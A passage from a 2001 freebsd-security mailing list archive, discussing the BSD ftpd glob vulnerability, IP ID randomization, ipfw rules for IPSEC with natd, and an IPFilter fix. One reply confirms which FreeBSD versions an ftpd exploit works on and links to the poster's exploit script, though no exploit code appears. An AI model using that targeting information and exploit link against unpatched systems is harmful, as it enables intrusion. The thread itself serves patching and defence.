-0000 Received: from unknown (HELO lagoon.freebsd.lublin.pl) (212.182.115.11) by 0 with SMTP; 16 Apr 2001 09:27:02 -0000 Received: (qmail 15588 invoked from network); 16 Apr 2001 09:27:02 -0000 Received: from unknown (HELO riget.scene.pl) () by 0 with SMTP; 16 Apr 2001 09:27:02 -0000 Received: (qmail 15585 invoked by uid 1001); 16 Apr 2001 09:27:02 -0000 Date: Mon, 16 Apr 2001 11:27:02 +0200 From: Przemyslaw Frasunek To: security@freebsd.org Subject: Re: (fwd) Remote BSD ftpd glob exploit Message-ID: <20010416112702.W700@riget.scene.pl> References: <20010416121606.A11997@dnepr.net> Mime-Version: 1.0 Content-Type: text/plain; charset=us-ascii Content-Disposition: inline User-Agent: Mutt/1.2.5i In-Reply-To: <20010416121606.A11997@dnepr.net>; from land@dnepr.net on Mon, Apr 16, 2001 at 12:16:07PM +0300 Sender: owner-freebsd-security@FreeBSD.ORG Precedence: bulk X-Loop: FreeBSD.org On Mon, Apr 16, 2001 at 12:16:07PM +0300, land@dnepr.net wrote: > Does exploit work on 4.1-RELEASE or 4-STABLE ? Yes, it will work on 4.1.1-RELEASE and 4.2-STABLE before correction date (29 March). My version of exploit was tested on my 4.2-STABLE: http://www.frasunek.com/sources/security/ftpd-bsd.pl -- * Fido: 2:480/124 ** WWW: http://www.frasunek.com/ ** NIC-HDL: PMF9-RIPE * * Inet: przemyslaw@frasunek.com ** PGP: D48684904685DF43EA93AFA13BE170BF * To Unsubscribe: send mail to majordomo@FreeBSD.org with "unsubscribe freebsd-security" in the body of the message From owner-freebsd-security Mon Apr 16 2:48:11 2001 Delivered-To: freebsd-security@freebsd.org Received: from obsecurity.dyndns.org (adsl-63-207-60-27.dsl.lsan03.pacbell.net [63.207.60.27]) by hub.freebsd.org (Postfix) with ESMTP id 09C2337B424; Mon, 16 Apr 2001 02:48:06 -0700 (PDT) (envelope-from kris@obsecurity.org) Received: by obsecurity.dyndns.org (Postfix, from userid 1000) id 441C5678BE; Mon, 16 Apr 2001 02:48:05 -0700 (PDT) Date: Mon, 16 Apr 2001 02:48:05 -0700 
From: Kris Kennaway To: Kris Kennaway Cc: Mike Silbersack , Mark T Roberts , freebsd-security@FreeBSD.ORG, net@FreeBSD.ORG Subject: Re: non-random IP IDs Message-ID: <20010416024805.A688@xor.obsecurity.org> References: <001f01c0c30b$805b0840$d2e2fdce@netrex.com> <20010416020311.A1292@xor.obsecurity.org> Mime-Version: 1.0 Content-Type: multipart/signed; micalg=pgp-md5; protocol="application/pgp-signature"; boundary="rwEMma7ioTxnRzrJ" Content-Disposition: inline User-Agent: Mutt/1.2.5i In-Reply-To: <20010416020311.A1292@xor.obsecurity.org>; from kris@obsecurity.org on Mon, Apr 16, 2001 at 02:03:11AM -0700 Sender: owner-freebsd-security@FreeBSD.ORG Precedence: bulk X-Loop: FreeBSD.org --rwEMma7ioTxnRzrJ Content-Type: text/plain; charset=us-ascii Content-Disposition: inline Content-Transfer-Encoding: quoted-printable On Mon, Apr 16, 2001 at 02:03:11AM -0700, Kris Kennaway wrote: > Here's a patch ported from OpenBSD which randomizes this (supposedly > such that it respects the constraint of not wrapping within the > prescribed time period). I should wrap it in a sysctl, I guess. >=20 > http://www.freebsd.org/~kris/ipid.patch Okay, I did this and updated the patch, with the sysctl defaulting to off since the random algorithm does add some amount of overhead. > Comments? 
Kris

-----BEGIN PGP SIGNATURE-----
Version: GnuPG v1.0.4 (FreeBSD)
Comment: For info see http://www.gnupg.org

iD8DBQE62r/UWry0BWjoQKURAqEhAKDMfAXAwJLg+qU1Wt9RVH9q6Oi+EACeKXRN
EA9+LNS3If04gRZFQ9YTGis=
=l1UB
-----END PGP SIGNATURE-----

From owner-freebsd-security Mon Apr 16 3:24: 7 2001
Received: from internal.mail.telinco.net (internal.mail.telinco.net [212.1.128.4]) by hub.freebsd.org (Postfix) with ESMTP id 9152037B424 for ; Mon, 16 Apr 2001 03:24:02 -0700 (PDT) (envelope-from b.candler@pobox.com)
Received: from ppp-dp1-mk-66.access.uk.worldonline.com ([212.74.113.66] helo=bloodhound.uk.worldonline.com) by internal.mail.telinco.net with esmtp (Exim 3.02 #1) id 14p6Ar-000J3h-00; Mon, 16 Apr 2001 11:24:01 +0100
Received: from brian by bloodhound.uk.worldonline.com with local (Exim 3.22 #1) id 14p6Ao-0003Zn-00; Mon, 16 Apr 2001 11:23:58 +0100
Date: Mon, 16 Apr 2001 11:23:58 +0100
From: Brian Candler
To: Lowell Gilbert
Cc: Rasputin, freebsd-security@freebsd.org
Subject: Re: Interaction between ipfw, IPSEC and natd
Message-ID: <20010416112358.A13561@linnet.org>
X-Mailer: Mutt 1.0.1i

> Some forms of IPSEC have fundamental problems with packet rewriting,
> which means that NAT is extremely hard to use in an IPSEC environment.
> Notably, end-to-end IPSEC modes are broken, although router-based
> tunnels can be a problem depending on whether the NAT rewriting occurs
> before or after the IPSEC headers are applied.
>
> Even without NAT, though, firewalls are a little tricky to configure
> for IPSEC packets. This is because the firewall can't see the
> protocol ports (or even the protocol, for that matter) in the packet,

Ah, it seems I wasn't clear :-) It's actually a very simple scenario, and I do not need IPSEC packets to be routed through the firewall at all. There are cleartext sessions which need NAT to be able to browse the outside Internet, and then cleartext packets which are IPSEC-tunnelled from one private network to another, like this:

        Internet                           Internet
           ^   . . . . . . . . . . . . . . .  ^
           |   ,       IPSEC tunnel        `  |
      +----------+                       +----------+
      | Firewall |                       | Firewall |
      +----------+                       +----------+
           |                                  |
        ---+---                            ---+---
        Office1                            Office2
      10.0.1.0/24                        10.0.2.0/24

Now, I have done a bit of experimentation and found the following.

1. Packets which are diverted to natd are reinjected into the ipfw ruleset at the following rule (actually 'man 8 natd' does say this). The packets do retain their 'in via ' tag. 'man 4 divert' documents the mechanism which makes this possible.

2. Incoming IPSEC packets pass _twice_ through the ipfw rules: once in their encapsulated form (protocol 50), and when decrypted they pass through the whole ruleset again, retaining their 'in via ' tag.

The second rule makes things a bit of a mess.
For starters, you need two rules to permit IPSEC traffic through, one in encrypted and one in decrypted form:

    add 1000 allow esp from to in via fxp0
    add 1010 allow ip from 10.0.1.0/24 to 10.0.2.0/24 in via fxp0

Now, it seems ipfw cannot tell the difference between a packet which came 'in via fxp0' in the clear, or 'in via fxp0' as IPSEC which was successfully decrypted and authenticated. It is not clear what happens if someone spoofs a packet with a 10.0.x source and dest address and injects it into the outside interface of the firewall; hopefully the IPSEC policy (/require) catches this case and drops the packet, but I would feel much happier with an explicit ipfw antispoofing rule.

Then you need to put natd _after_ this so that the IPSEC tunneled traffic is not subject to NAT:

    add 1020 divert 8668 ip from any to any via fxp0

i.e. rule 1010 catches the tunnel-decrypted traffic. Of course, this only works because we know the IP address space used at each end of the tunnel; these rules could get complicated in a more complex environment than the one shown above, and it would be a pain keeping the SPD and ipfw rules in sync.

I have done some poking around, and it seems that NetBSD had the same issue:

http://www.netbsd.org/Documentation/network/ipsec/#ipf-interaction

They made a change in February, and their new behaviour is:

"ipf(4) looks at packets in native wire format only. ipf(4) looks at packets before IPsec processing on inbound, and after IPsec processing on outbound."

This looks reasonable to me, except that it appears impossible to have an 'untrusted IPSEC tunnel' (that is, a tunnel which you want to filter traffic from before allowing it in).

Since you might want to have different policies for different tunnels, it would be very nice for ipfw to be able to test which tunnel traffic came through (e.g. "in via x.x.x.x" where x.x.x.x is the IP address of the remote tunnel endpoint). Just a thought.
Anyway, I think my original point still stands - whatever FreeBSD does, all this needs to be documented properly :-)

Regards,

Brian.

P.S. It appears that all this has been discussed before, so sorry for the overlap...
http://docs.FreeBSD.org/cgi/getmsg.cgi?fetch=116841+0+/usr/local/www/db/text/2001/freebsd-security/20010325.freebsd-security

P.P.S. OpenBSD appears to pass traffic through the filters twice, but you can differentiate IPSEC traffic by looking for the 'enc0' interface:
http://www.openbsd.org/cgi-bin/man.cgi?query=vpn&apropos=0&sektion=0&format=html

From owner-freebsd-security Mon Apr 16 5:44: 4 2001
Received: from ns.morning.ru (ns.morning.ru [195.161.98.5]) by hub.freebsd.org (Postfix) with ESMTP id E5F2137B424 for ; Mon, 16 Apr 2001 05:43:59 -0700 (PDT) (envelope-from subscr@morning.ru)
Received: from NIC1 (early.morning.ru [195.161.98.238]) by ns.morning.ru (8.9.3/8.9.3) with ESMTP id UAA90182; Mon, 16 Apr 2001 20:14:51 +0800 (KRAST) (envelope-from subscr@morning.ru)
Date: Mon, 16 Apr 2001 20:14:23 +0700
From: Igor Podlesny
X-Mailer: The Bat! (v1.51) UNREG / CD5BF9353B3B7091
Organization: Morning Network
Message-ID: <5134818957.20010416201423@morning.ru>
To: Darren Reed
Cc: freebsd-security@FreeBSD.ORG
Subject: Re[2]: URGENT: Serious bug in IPFilter (fwd)
In-Reply-To: <200104070644.QAA24197@cairo.anu.edu.au>
References: <200104070644.QAA24197@cairo.anu.edu.au>

Hi!

Guys, what's going on?
The patch is still not available in the CVS tree yet?!

>> It looks like darrenr committed a fix to HEAD, but it's not MFC-ed yet
>> AFAIK:

DR> This has since happened with jkh's approval.
DR> Hmmm, maybe I should have mentioned that in the commit (doh!)

DR> Darren

--
Igor
mailto:poige@morning.ru

From owner-freebsd-security Mon Apr 16 5:50:52 2001
Received: from peitho.fxp.org (peitho.fxp.org [209.26.95.40]) by hub.freebsd.org (Postfix) with ESMTP id 24D3B37B424 for ; Mon, 16 Apr 2001 05:50:49 -0700 (PDT) (envelope-from cdf.lists@fxp.org)
Received: by peitho.fxp.org (Postfix, from userid 1501) id 7D4ED1360C; Mon, 16 Apr 2001 08:50:48 -0400 (EDT)
Date: Mon, 16 Apr 2001 08:50:48 -0400
From: Chris Faulhaber
To: Igor Podlesny
Cc: Darren Reed, freebsd-security@FreeBSD.ORG
Subject: Re: URGENT: Serious bug in IPFilter (fwd)
Message-ID: <20010416085048.A66477@peitho.fxp.org>
Mail-Followup-To: Chris Faulhaber, Igor Podlesny, Darren Reed, freebsd-security@FreeBSD.ORG
References: <200104070644.QAA24197@cairo.anu.edu.au> <5134818957.20010416201423@morning.ru>
User-Agent: Mutt/1.2.5i
In-Reply-To: <5134818957.20010416201423@morning.ru>; from subscr@morning.ru on Mon, Apr 16, 2001 at 08:14:23PM +0700

On Mon, Apr 16, 2001 at 08:14:23PM +0700, Igor Podlesny wrote:
>
> Hi!
>
> Guys, what's going on?
> The patch is still not available in the CVS tree yet?!
>

As previously stated, the fixes have been committed to -current and -stable. For example:

Revision 1.10.2.4 / (download) - annotate - [select for diffs], Sat Apr 7 03:40:31 2001 UTC (9 days, 9 hours ago) by darrenr
Branch: RELENG_4
fix security hole created by fragment cache

Revision 1.15 / (download) - annotate - [select for diffs], Fri Apr 6 15:52:28 2001 UTC (9 days, 20 hours ago) by darrenr
Branch: MAIN
CVS Tags: HEAD
fix security hole created by fragment cache

From http://www.FreeBSD.org/cgi/cvsweb.cgi/src/sys/netinet/ip_frag.c

--
Chris D.
Faulhaber - jedgar@fxp.org - jedgar@FreeBSD.org
--------------------------------------------------------
FreeBSD: The Power To Serve - http://www.FreeBSD.org

-----BEGIN PGP SIGNATURE-----
Version: GnuPG v1.0.4 (FreeBSD)
Comment: FreeBSD: The Power To Serve

iEYEARECAAYFAjra6qgACgkQObaG4P6BelBBpACbBKswsn4WLlbQnIgfzT5BOXyT
0d4An2owclAEJVhvpSF/6FqQwQC+6XaR
=YF+H
-----END PGP SIGNATURE-----

From owner-freebsd-security Mon Apr 16 6:47:43 2001
Received: from ns.morning.ru (ns.morning.ru [195.161.98.5]) by hub.freebsd.org (Postfix) with ESMTP id E339037B423 for ; Mon, 16 Apr 2001 06:47:37 -0700 (PDT) (envelope-from subscr@morning.ru)
Received: from NIC1 (early.morning.ru [195.161.98.238]) by ns.morning.ru (8.9.3/8.9.3) with ESMTP id VAA93407; Mon, 16 Apr 2001 21:50:52 +0800 (KRAST) (envelope-from subscr@morning.ru)
Date: Mon, 16 Apr 2001 21:50:25 +0700
From: Igor Podlesny
X-Mailer: The Bat! (v1.51) UNREG / CD5BF9353B3B7091
Organization: Morning Network
Message-ID: <12940580121.20010416215025@morning.ru>
To: Chris Faulhaber
Cc: freebsd-security@FreeBSD.ORG
Subject: Re[2]: URGENT: Serious bug in IPFilter (fwd)
In-Reply-To: <20010416094147.A15919@peitho.fxp.org>
References: <200104070644.QAA24197@cairo.anu.edu.au> <5134818957.20010416201423@morning.ru> <20010416085048.A66477@peitho.fxp.org> <12439616084.20010416213421@morning.ru> <20010416094147.A15919@peitho.fxp.org>

CF> On Mon, Apr 16, 2001 at 09:34:21PM +0700, Igor Podlesny wrote:
>>
>> CF> On Mon, Apr 16, 2001 at 08:14:23PM +0700, Igor Podlesny wrote:
>> >>
>> >> Hi!
>> >>
>> >> Guys, what's going on?
>> >> The patch is still not available in the CVS tree yet?!
>> >>
>>
>> Hi!
>> Hm... it is very strange to me then, because my ip_frag.c after CVSuping
>> is:
>>
>> #if !defined(lint)
>> static const char sccsid[] = "@(#)ip_frag.c 1.11 3/24/96 (C) 1993-2000 Darren Reed";
>> static const char rcsid[] = "@(#)$Id: ip_frag.c,v 2.10.2.7 2000/11/27 10:26:56 darrenr Exp $";
>> #endif
>>
>> and I did CVSup just about an hour ago!
>>
>> what could the problem be?
>>
CF> Not sure.
CF> What tag are you specifying?

RELENG_4

CF> Have you tried another
CF> cvsup server?

hm... I used cvsup7.freebsd.org
now I'll try cvsup2...
I think they are supposed to keep things in sync...

CF> Also, this should really be kept on the list since I am not
CF> a cvs/cvsup guru.

ok

Anybody CVSuping, answer, plz!
--
Igor
mailto:poige@morning.ru

From owner-freebsd-security Mon Apr 16 6:56:15 2001
Received: from ns.morning.ru (ns.morning.ru [195.161.98.5]) by hub.freebsd.org (Postfix) with ESMTP id 8E65E37B43E for ; Mon, 16 Apr 2001 06:56:10 -0700 (PDT) (envelope-from poige@morning.ru)
Received: from NIC1 (early.morning.ru [195.161.98.238]) by ns.morning.ru (8.9.3/8.9.3) with ESMTP id VAA93688; Mon, 16 Apr 2001 21:59:30 +0800 (KRAST) (envelope-from poige@morning.ru)
Date: Mon, 16 Apr 2001 21:59:02 +0700
From: Igor Podlesny
X-Mailer: The Bat! (v1.51) UNREG / CD5BF9353B3B7091
Organization: Morning Network
Message-ID: <1241097685.20010416215902@morning.ru>
To: Chris Faulhaber
Cc: freebsd-security@FreeBSD.ORG
Subject: Re[3]: URGENT: Serious bug in IPFilter (fwd)
In-Reply-To: <12940580121.20010416215025@morning.ru>
References: <200104070644.QAA24197@cairo.anu.edu.au> <5134818957.20010416201423@morning.ru> <20010416085048.A66477@peitho.fxp.org> <12439616084.20010416213421@morning.ru> <20010416094147.A15919@peitho.fxp.org> <12940580121.20010416215025@morning.ru>

Excuse me, everybody, I had messed things up -- /usr/src/sys/netinet/ip_frag.c and /usr/src/contrib/ipfilter/...

I'm really sorry...

CF>> On Mon, Apr 16, 2001 at 09:34:21PM +0700, Igor Podlesny wrote:
>>>
>>> CF> On Mon, Apr 16, 2001 at 08:14:23PM +0700, Igor Podlesny wrote:
>>> >>
>>> >> Hi!
>>> >>
>>> >> Guys, what's going on?
>>> >> The patch is still not available in the CVS tree yet?!
>>> >>
>>>
>>> Hi!
>>> Hm... it is very strange to me then, because my ip_frag.c after CVSuping
>>> is:
>>>
>>> #if !defined(lint)
>>> static const char sccsid[] = "@(#)ip_frag.c 1.11 3/24/96 (C) 1993-2000 Darren Reed";
>>> static const char rcsid[] = "@(#)$Id: ip_frag.c,v 2.10.2.7 2000/11/27 10:26:56 darrenr Exp $";
>>> #endif
>>>
>>> and I did CVSup just about an hour ago!
>>>
>>> what could the problem be?
>>>
CF>> Not sure.
CF>> What tag are you specifying?

IP> RELENG_4

CF>> Have you tried another
CF>> cvsup server?

IP> hm... I used cvsup7.freebsd.org
IP> now I'll try cvsup2...
IP> I think they are supposed to keep things in sync...

CF>> Also, this should really be kept on the list since I am not
CF>> a cvs/cvsup guru.

IP> ok

IP> Anybody CVSuping, answer, plz!
--
Igor
mailto:poige@morning.ru

From owner-freebsd-security Mon Apr 16 7:37:31 2001
Received: from homer.softweyr.com (bsdconspiracy.net [208.187.122.220]) by hub.freebsd.org (Postfix) with ESMTP id 248BD37B43F; Mon, 16 Apr 2001 07:37:25 -0700 (PDT) (envelope-from wes@softweyr.com)
Received: from [127.0.0.1] (helo=softweyr.com ident=67b8f9b839749317407b58ec008f73e6) by homer.softweyr.com with esmtp (Exim 3.16 #1) id 14pA7d-0000Vq-00; Mon, 16 Apr 2001 08:36:58 -0600
Message-ID: <3ADB0389.5D236D88@softweyr.com>
Date: Mon, 16 Apr 2001 08:36:57 -0600
From: Wes Peters
Organization: Softweyr LLC
X-Mailer: Mozilla 4.75 [en] (X11; U; Linux 2.2.12 i386)
X-Accept-Language: en
To: Kris Kennaway
Cc: freebsd-security@FreeBSD.ORG, net@FreeBSD.org
Subject: Re: non-random IP IDs
References: <001f01c0c30b$805b0840$d2e2fdce@netrex.com> <20010416020311.A1292@xor.obsecurity.org>

Kris Kennaway wrote:
>
> On Thu, Apr 12, 2001 at 12:40:32AM -0500, Mike Silbersack wrote:
>
> > Each IP packet sent has with it a 16-bit ID. The numbers must remain
> > unique over a short period of time so fragmentation can work properly. As
> > such, everything except recent OpenBSDs simply increments the id by 1 for
> > each packet sent out.
> >
> > As a result, you can tell the number of packets sent on an idle host by
> > seeing the difference in id numbers for the packets it sends back to you.
> > It's not really that important of an issue, don't worry about it.
>
> Here's a patch ported from OpenBSD which randomizes this (supposedly
> such that it respects the constraint of not wrapping within the
> prescribed time period). I should wrap it in a sysctl, I guess.
>
> http://www.freebsd.org/~kris/ipid.patch
>
> Comments?

Looks clean. The only comment I can find is: Why not have ip_randomid() return the ID in network byte order? It would save several HTONS macros trailing the ip_randomid() calls.

--
"Where am I, and what am I doing in this handbasket?"
Wes Peters                                                Softweyr LLC
wes@softweyr.com                                   http://softweyr.com/

From owner-freebsd-security Mon Apr 16 8: 3:20 2001
Received: from mail.fdma.com (mail.fdma.com [216.241.67.73]) by hub.freebsd.org (Postfix) with ESMTP id E2E1C37B43C for ; Mon, 16 Apr 2001 08:03:10 -0700 (PDT) (envelope-from scheidell@fdma.com)
Received: from MIKELT (mikelt.fdma.lan [192.168.3.5]) by mail.fdma.com (8.11.3/8.11.3) with SMTP id f3GF38a40711 for ; Mon, 16 Apr 2001 11:03:09 -0400 (EDT)
Message-ID: <000901c0c686$59ac3830$0503a8c0@fdma.com>
From: "Michael Scheidell"
Subject: Fw: Please help with ftpd glob hack
Date: Mon, 16 Apr 2001 11:02:40 -0400
Organization: Florida Datamation, Inc.
X-Mailer: Microsoft Outlook Express 5.50.4522.1200

I have a 4.2-REL on intel and would like to get either the new ftpd or the files to compile it. I don't have enough space on this embedded system for the full cvsup (I tried).

Also, I tried looking at the various sources to see where it might be. I compiled some with dates of March 28, but 'version' still shows 600LS.

Also, if possible, a newer version of ntpd.

Thank you in advance for your help.

----- Original Message -----
From: "Michael Scheidell"
Sent: Saturday, April 14, 2001 4:13 PM
Subject: Please help

> Please help.
> I have tried.
> I don't have the hd space to do a full CVSUP, but I would like to find a
> compiled version of ftpd for 4.2-release or 4.2stable, as mentioned in the
> cert advisory.
>
>
> ----- Original Message -----
> From: "Michael Scheidell"
> Sent: Tuesday, April 10, 2001 10:34 AM
> Subject: RE: CERT Advisory CA-2001-07
>
>
> > According to
> >
> > CERT Advisory CA-2001-07, FreeBSD has fixed (as of a little after midnight
> > today? 4/10/2001? ) a glob problem in ftpd in the 'current' and stable
> > release
> >
> > I looked everywhere I could think of and best I could find is the source on
> > SOME of the ftpx.freebsd.org/ sites has some new header files in
> > /usr/include and source in ../libexec/ftpd dated March 28th and 27th.
> >
> > These still compile with 'version' 6.00LS (and, in fact, I think one of the
> > ftp servers is still running that one?)
> >
> > Can you tell me where I can find the binary for 9386/ 4.2-release or 4.2
> > stable, or sources for the fix ? thanks.
> >
> > ---
> > Michael Scheidell
> > Florida Datamation, Inc.
> > scheidell@fdma.com / 1+(561) 368-9561
> > Internet Security and Consulting
> > See updated IT Security News at http://www.fdma.com
> >
>

From owner-freebsd-security Mon Apr 16 8:16: 7 2001
Received: from giganda.komkon.org (giganda.komkon.org [209.125.17.66]) by hub.freebsd.org (Postfix) with ESMTP id D7E4937B424 for ; Mon, 16 Apr 2001 08:16:04 -0700 (PDT) (envelope-from str@giganda.komkon.org)
Received: (from str@localhost) by giganda.komkon.org (8.9.3/8.9.3) id LAA70850 for security@FreeBSD.ORG; Mon, 16 Apr 2001 11:16:06 -0400 (EDT) (envelope-from str)
Date: Mon, 16 Apr 2001 11:16:06 -0400 (EDT)
From: Igor Roshchin
Message-Id: <200104161516.LAA70850@giganda.komkon.org>
To: security@FreeBSD.ORG
Subject: Wu-ftpd and Remote BSD ftpd glob exploit
In-Reply-To: <20010416112702.W700@riget.scene.pl>

Can anybody, please, tell explicitly, or point me to a posting/URL with an answer to the question:

"Is the Wu-ftpd server [and those derived from it] also vulnerable?"

So far I saw neither positive nor negative identification, but maybe I missed one.

Thanks,

Igor

From owner-freebsd-security Mon Apr 16 8:21:57 2001
Received: from jamus.xpert.com (jamus.xpert.com [199.203.132.17]) by hub.freebsd.org (Postfix) with ESMTP id 9433D37B446 for ; Mon, 16 Apr 2001 08:21:51 -0700 (PDT) (envelope-from roman@xpert.com)
Received: from roman (helo=localhost) by jamus.xpert.com with local-esmtp (Exim 3.13 #1) id 14pAtY-0001H4-00; Mon, 16 Apr 2001 18:26:28 +0300
Date: Mon, 16 Apr 2001 18:26:28 +0300 (IDT)
From: Roman Shterenzon
To: Alfred Perlstein
Subject: Re: 4.3rc2: if=/etc/issue in /etc/gettytab is not respected
In-Reply-To: <20010403160232.I12164@fw.wintelcom.net>
Organization: Xpert UNIX Systems Ltd.

So I guess the RELEASE will be made with this bug :(

On Tue, 3 Apr 2001, Alfred Perlstein wrote:

> * Roman Shterenzon [010403 15:35] wrote:
> > With enough attention and code analysis, that could be made before
> > 4.3-RELEASE. There's almost two weeks left, and many people who are
> > willing to test it. Me for example :)
>
> There's basically two telnetd's in the source tree. When you
> compile and install the one from src/secure/libexec/telnetd you
> get one that doesn't respect the if= directive. It looks like
> it doesn't even respect the other settings, something to do
> with the USER environment variable.
>
> I've moved this to the security list in an effort to get this
> explained.
>
> Anyone know why this is going on?
>
> Basically in "normal" (src/libexec/telnetd.c)
> this:
>
>     if (getenv("USER"))
>         hostinfo = 0;
>
> is false, but under "crypto" (src/crypto/telnet/telnetd/telnetd.c)
> it's true and therefore doesn't display the login info.
>
>
> --
> -Alfred Perlstein - [bright@wintelcom.net|alfred@freebsd.org]
> Instead of asking why a piece of software is using "1970s technology,"
> start asking why software is ignoring 30 years of accumulated wisdom.
>

--
Roman Shterenzon, UNIX System Administrator and Consultant
[ Xpert UNIX Systems Ltd., Herzlia, Israel.
Tel: +972-9-9522361 ]

From owner-freebsd-security Mon Apr 16 8:48:48 2001
Received: from ashburn.skiltech.com (ashburn.skiltech.com [216.235.79.239]) by hub.freebsd.org (Postfix) with ESMTP id 4186637B423 for ; Mon, 16 Apr 2001 08:48:46 -0700 (PDT) (envelope-from minter@ashburn.skiltech.com)
Received: (from minter@localhost) by ashburn.skiltech.com (8.11.1/8.11.1) id f3GFeVh06557; Mon, 16 Apr 2001 11:40:31 -0400 (EDT) (envelope-from minter)
Date: Mon, 16 Apr 2001 11:40:31 -0400 (EDT)
From: "H. Wade Minter"
Subject: Rebuilding FTPD

What's the procedure for rebuilding ftpd after a cvsup to fix the globbing bug? I tried "cd /usr/src/libexec/ftpd && make install", but that didn't work. I'm running 4-STABLE.

Thanks,
Wade

From owner-freebsd-security Mon Apr 16 8:54:41 2001
Received: from calliope.cs.brandeis.edu (calliope.cs.brandeis.edu [129.64.3.189]) by hub.freebsd.org (Postfix) with ESMTP id 4950937B43C for ; Mon, 16 Apr 2001 08:54:37 -0700 (PDT) (envelope-from meshko@calliope.cs.brandeis.edu)
Received: from localhost (meshko@localhost) by calliope.cs.brandeis.edu (8.9.3/8.9.3) with ESMTP id LAA17977; Mon, 16 Apr 2001 11:54:32 -0400
Date: Mon, 16 Apr 2001 11:54:32 -0400 (EDT)
From: Mikhail Kruk
To: "H. Wade Minter"
Subject: Re: Rebuilding FTPD

My guess would be that you need to cd /usr/src/lib/libc/ and make install there. Please note that I haven't tried it and it very well may break something for you.

> What's the procedure for rebuilding ftpd after a cvsup to fix the globbing
> bug? I tried "cd /usr/src/libexec/ftpd && make install", but that didn't
> work. I'm running 4-STABLE.
>
> Thanks,
> Wade
>

From owner-freebsd-security Mon Apr 16 9:45:24 2001
Received: from areca.wanadoo.fr (smtp-rt-4.wanadoo.fr [193.252.19.156]) by hub.freebsd.org (Postfix) with ESMTP id 210AF37B43C for ; Mon, 16 Apr 2001 09:45:22 -0700 (PDT) (envelope-from khaddad@wanadoo.fr)
Received: from antholoma.wanadoo.fr (193.252.19.153) by areca.wanadoo.fr; 16 Apr 2001 18:45:20 +0200
Received: from khalil (193.251.55.96) by antholoma.wanadoo.fr; 16 Apr 2001 18:44:42 +0200
Message-ID: <002701c0c694$6774ef30$0200a8c0@khalil>
From: "Khalil Haddad"
Subject: FTP - block outer connections
Date: Mon, 16 Apr 2001 18:43:44 +0200
X-Mailer: Microsoft Outlook Express 5.50.4133.2400

Hello all,

I have an FBSD box running FTPD. I would like it to listen only on ONE of my NIC cards, i.e. the one that is not connected to the net. Can anyone help me secure it?

Thanks

From owner-freebsd-security Mon Apr 16 9:49:13 2001
Received: from ns1.via-net-works.net.ar (ns1.via-net-works.net.ar [200.10.100.10]) by hub.freebsd.org (Postfix) with ESMTP id 0B50537B42C for ; Mon, 16 Apr 2001 09:49:10 -0700 (PDT) (envelope-from fpscha@ns1.via-net-works.net.ar)
Received: (from fpscha@localhost) by ns1.via-net-works.net.ar (8.9.3/8.9.3) id NAA26855; Mon, 16 Apr 2001 13:51:34 -0300 (ART)
From: Fernando Schapachnik
Message-Id: <200104161651.NAA26855@ns1.via-net-works.net.ar>
Subject: Re: FTP - block outer connections
In-Reply-To: <002701c0c694$6774ef30$0200a8c0@khalil> "from Khalil Haddad at Apr 16, 2001 06:43:44 pm"
To: Khalil Haddad
Date: Mon, 16 Apr 2001 13:51:33 -0300 (ART)
Cc: security@FreeBSD.ORG
Reply-To: Fernando Schapachnik
X-Mailer: ELM [version 2.4ME+ PL82 (25)]

Look at man 5 hosts_access, this should help.

Regards.

In an earlier message, Khalil Haddad wrote:
> Hello all,
> I have an FBSD box running FTPD. I would like it to listen only on ONE of my
> NIC cards, i.e. the one that is not connected to the net. Can anyone help me
> secure it?
>
> Thanks
>

Fernando P. Schapachnik
Network and technology planning
VIA NET.WORKS ARGENTINA S.A.
fschapachnik@vianetworks.com.ar
Tel.: (54-11) 4323-3381

From owner-freebsd-security Mon Apr 16 10:32:40 2001
Received: from hotmail.com (f68.law3.hotmail.com [209.185.241.68]) by hub.freebsd.org (Postfix) with ESMTP id 2337D37B422 for ; Mon, 16 Apr 2001 10:32:38 -0700 (PDT) (envelope-from merkury55@hotmail.com)
Received: from mail pickup service by hotmail.com with Microsoft SMTPSVC; Mon, 16 Apr 2001 10:32:37 -0700
Received: from 4.40.152.183 by lw3fd.law3.hotmail.msn.com with HTTP; Mon, 16 Apr 2001 17:32:37 GMT
X-Originating-IP: [4.40.152.183]
From: "Nick Mazza"
To: security@FreeBSD.ORG
Subject: FreeBSD Login
Date: Mon, 16 Apr 2001 10:32:37 -0700

This doesn't pertain to security so I will probably be flamed for this email, but I am in urgent need of an answer to a simple FreeBSD boot question. I am dual booting a Windows 2000 machine and FreeBSD 4.3RC2 and using the FBSD boot loader. The boot loader appears like this:

    F1: ??
    F3: FreeBSD
    F5: Drive 1

    Default: F3 /* Or the OS that I booted last */

I want to be able to change the ?? to say Windows 2000 and have the default OS boot Windows 2000 even if my last boot was FBSD (personally I don't mind things, but guests who use this computer always get confused and press F5 or something). If anyone can help or point me in the direction of a HOW-TO I would greatly appreciate it.
Nick Mazza

From owner-freebsd-security Mon Apr 16 10:44: 6 2001
Received: from imr1.ericy.com (imr1.ericy.com [208.237.135.240]) by hub.freebsd.org (Postfix) with ESMTP id 7EA6637B423 for ; Mon, 16 Apr 2001 10:44:02 -0700 (PDT) (envelope-from Antoine.Beaupre@ericsson.ca)
Received: from mr5.exu.ericsson.se (mr5u3.ericy.com [208.237.135.124]) by imr1.ericy.com (8.10.2/8.10.2) with ESMTP id f3GHi0B15881; Mon, 16 Apr 2001 12:44:00 -0500 (CDT)
Received: from noah.lmc.ericsson.se (noah.lmc.ericsson.se [142.133.1.1]) by mr5.exu.ericsson.se (8.11.3/8.11.3) with ESMTP id f3GHhv627750; Mon, 16 Apr 2001 12:43:58 -0500 (CDT)
Received: from lmc35.lmc.ericsson.se (lmc35.lmc.ericsson.se [142.133.16.175]) by noah.lmc.ericsson.se (8.11.2/8.9.2) with ESMTP id f3GHhup09258; Mon, 16 Apr 2001 13:43:56 -0400 (EDT)
Received: by lmc35.lmc.ericsson.se with Internet Mail Service (5.5.2653.19) id <2TN8RD0N>; Mon, 16 Apr 2001 13:43:55 -0400
Received: from lmc.ericsson.se (lmcpc100455.pc.lmc.ericsson.se [142.133.23.150]) by LMC37.lmc.ericsson.se with SMTP (Microsoft Exchange Internet Mail Service Version 5.5.2653.13) id 2N3XJG0M; Mon, 16 Apr 2001 13:43:46 -0400
From: "Antoine Beaupre (LMC)"
Reply-To: /dev/null@ericsson.ca
To: Nick Mazza
Cc: security@FreeBSD.ORG
Message-ID: <3ADB2F50.A66BFFD8@lmc.ericsson.se>
Date: Mon, 16 Apr 2001 13:43:44 -0400
Organization: LMC, Ericsson Research Canada
X-Mailer: Mozilla 4.7 [en]C-CCK-MCD (WinNT; U)
